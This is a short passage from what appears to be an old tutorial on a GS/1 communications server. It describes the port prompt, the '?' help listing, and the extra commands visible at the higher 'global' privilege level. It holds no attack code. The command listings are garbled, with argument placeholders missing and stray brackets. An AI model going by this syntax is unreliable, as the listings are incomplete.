The prompt will look similar to this: (!2) GS/1> (The (!2) refers to the port you are on) +--------------------+ + #2. Getting help + +--------------------+ First try typing a '?' to display help items. A help listing looks like this: > (!2) GS/1>? > Connect

[,
] [ ECM ] [ Q ] > DO > Echo > Listen > Pause [] > PIng
[ timeout ] > SET = ... > SHow ... At higher privileges such as global (mentioned next) the help will look like this (note the difference in the GS/1 prompt with a # sign): > (!2) GS/1# ? > BRoadcast (
) > Connect (
)
[,
] [ ECM ] [ Q ] > DEFine = ( ) > DisConnect (
) [] > DO (
) > Echo > Listen (
) > Pause [] > PIng
[ timeout ] > ReaD (
)